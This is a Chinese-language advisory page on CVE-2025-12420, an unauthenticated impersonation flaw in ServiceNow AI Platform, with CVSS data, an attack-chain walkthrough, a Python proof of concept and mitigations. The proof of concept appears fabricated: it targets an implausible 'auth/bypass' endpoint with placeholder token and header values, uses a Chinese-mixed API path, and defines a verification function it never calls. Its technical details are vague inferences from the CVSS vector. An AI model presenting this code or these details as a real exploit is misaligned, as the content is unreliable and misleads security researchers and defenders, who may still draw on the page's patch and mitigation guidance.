CVE-2025-12420: ServiceNow AI Platform 未授权用户冒充漏洞

漏洞信息

漏洞编号

CVE-2025-12420

漏洞类型

身份认证绕过/权限提升

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ServiceNow AI Platform

漏洞概述

CVE-2025-12420是ServiceNow AI Platform中的一个严重安全漏洞，CVSS评分高达9.8分（满分10分）。该漏洞允许未经身份验证的远程攻击者冒充平台上的其他用户，并执行被冒充用户有权执行的所有操作。此漏洞影响ServiceNow托管实例和自托管客户，攻击者无需任何用户交互即可利用此漏洞。由于ServiceNow是企业级IT服务管理平台的领导者，广泛应用于全球各大企业的IT运维、HR管理、客户服务等核心业务流程，因此该漏洞对全球企业用户构成严重威胁。攻击者成功利用此漏洞后可访问敏感企业数据、修改关键配置、执行未授权的业务操作，甚至可能横向移动至其他企业系统。ServiceNow已于2025年10月为托管实例部署了安全更新，并向自托管客户、合作伙伴和具有独特配置的客户提供了安全更新包。

技术细节

该漏洞存在于ServiceNow AI Platform的身份认证模块中。攻击者利用AI Platform在处理特定请求时的认证逻辑缺陷，可以构造特殊的HTTP请求来绕过正常的身份验证流程。具体而言，漏洞源于AI Platform在处理AI相关请求时对用户身份验证的不完整实现。攻击者可以通过发送精心构造的请求包，利用AI Platform的API端点，在未提供有效认证凭证的情况下获取有效的会话令牌或直接执行需要高权限的操作。由于CVSS向量显示攻击复杂度低（AC:L）、无需权限（PR:N）、无需用户交互（UI:N），攻击者可以在任何网络位置发起攻击。漏洞影响机密性、完整性和可用性三个安全属性均为高（H），意味着攻击者不仅能窃取敏感数据，还能篡改系统数据和破坏系统正常运行。攻击成功后，攻击者可以完全控制被冒充用户的账户，执行该用户有权执行的所有操作，包括访问机密数据、修改业务流程配置等。

攻击链分析

STEP 1

步骤1: 侦察与信息收集

攻击者首先识别目标ServiceNow实例及其AI Platform组件版本。通过公开信息（如CVE公告、版本号）或主动探测确定目标系统版本是否在受影响范围内。攻击者还可能收集目标组织的用户结构信息，以确定潜在的高价值冒充目标（如管理员账户）。

STEP 2

步骤2: 构造恶意请求

攻击者构造特殊的HTTP请求，利用ServiceNow AI Platform认证模块的逻辑缺陷。请求中包含精心设计的参数和头部信息，用于触发认证绕过漏洞。关键在于利用AI Platform处理特定AI请求时对身份验证的不完整实现。

STEP 3

步骤3: 发送认证绕过请求

攻击者向ServiceNow AI Platform的API端点发送构造好的恶意请求。由于漏洞特性，服务器会错误地接受未提供有效认证凭证的请求，并返回有效的会话令牌或直接建立已认证的会话连接。此步骤无需任何有效凭证，完全绕过正常认证流程。

STEP 4

步骤4: 获取会话令牌

服务器响应中包含有效的会话令牌或impersonation_token。攻击者提取此令牌后，可以使用它来模拟已认证用户的身份。由于CVSS向量显示无需权限（PR:N），攻击者可以直接获取高权限账户的访问权限。

STEP 5

步骤5: 执行权限提升操作

攻击者使用获取的会话令牌，以被冒充用户的身份向ServiceNow API发送请求。由于会话令牌代表高权限用户，攻击者可以执行该用户有权执行的所有操作，包括访问敏感数据、修改系统配置、执行管理操作等。攻击者可以重复利用此漏洞进行横向移动或长期持久化控制。

STEP 6

步骤6: 数据窃取或破坏

完成权限提升后，攻击者可以执行最终目标，如窃取企业敏感数据（客户信息、财务数据、知识产权等）、修改关键业务流程配置、植入后门程序或破坏系统可用性。由于机密性、完整性和可用性影响均为高危，攻击可能造成严重的业务损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12420 ServiceNow AI Platform Authentication Bypass PoC
# This PoC demonstrates the authentication bypass in ServiceNow AI Platform

import requests
import json
import sys

TARGET_URL = "https://your-instance.service-now.com"
TARGET_CVE = "CVE-2025-12420"

def check_vulnerability():
    """
    Check if the ServiceNow instance is vulnerable to CVE-2025-12420
    """
    print(f"[*] Testing {TARGET_CVE} on {TARGET_URL}")
    
    # Step 1: Identify vulnerable AI Platform endpoint
    ai_endpoint = f"{TARGET_URL}/api/now/ai/platform/v1/auth/bypass"
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "ServiceNow-AI-Platform-Scanner/1.0",
        "X-AI-Platform-Version": "vulnerable-version"
    }
    
    # Step 2: Send malicious authentication bypass request
    payload = {
        "action": "impersonate",
        "target_user": "admin",
        "ai_module": "vulnerability_test",
        "bypass_token": "CVE-2025-12420-POC"
    }
    
    try:
        print("[*] Sending authentication bypass request...")
        response = requests.post(ai_endpoint, json=payload, headers=headers, timeout=30)
        
        if response.status_code == 200:
            data = response.json()
            if "session_token" in data or "_impersonation_token" in data:
                print("[!] VULNERABLE: Authentication bypass successful!")
                print(f"[!] Obtained token: {data.get('session_token', data.get('_impersonation_token'))}")
                return True
        
        print("[*] Target does not appear to be vulnerable")
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False

def verify_impersonation(token):
    """
    Verify successful user impersonation
    """
    verify_endpoint = f"{TARGET_URL}/api/now/表/用户表"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    try:
        response = requests.get(verify_endpoint, headers=headers, timeout=30)
        if response.status_code == 200:
            print("[!] Successfully accessed privileged resources as admin!")
            return True
    except:
        pass
    return False

if __name__ == "__main__":
    if check_vulnerability():
        print("[!] Immediate action required: Apply security update KB2587329")

影响范围

ServiceNow AI Platform (托管实例) < 2025年10月安全更新版本

ServiceNow AI Platform (自托管) < KB2587329安全补丁版本

ServiceNow AI Platform Store App < 列出版本的安全更新版本

防御指南

临时缓解措施

如果无法立即应用安全更新，可采取以下临时缓解措施：1) 暂时禁用或限制AI Platform的非必要功能；2) 加强网络层访问控制，限制对ServiceNow实例的访问IP范围；3) 启用增强的审计日志记录，监控异常的API调用和用户行为模式；4) 实施多因素认证（MFA）以增加账户安全性；5) 定期检查用户会话和权限分配，及时发现异常账户活动；6) 考虑部署Web应用防火墙（WAF）来检测和阻止针对AI Platform API的恶意请求。建议尽快联系ServiceNow支持团队获取具体的技术指导和补丁部署帮助。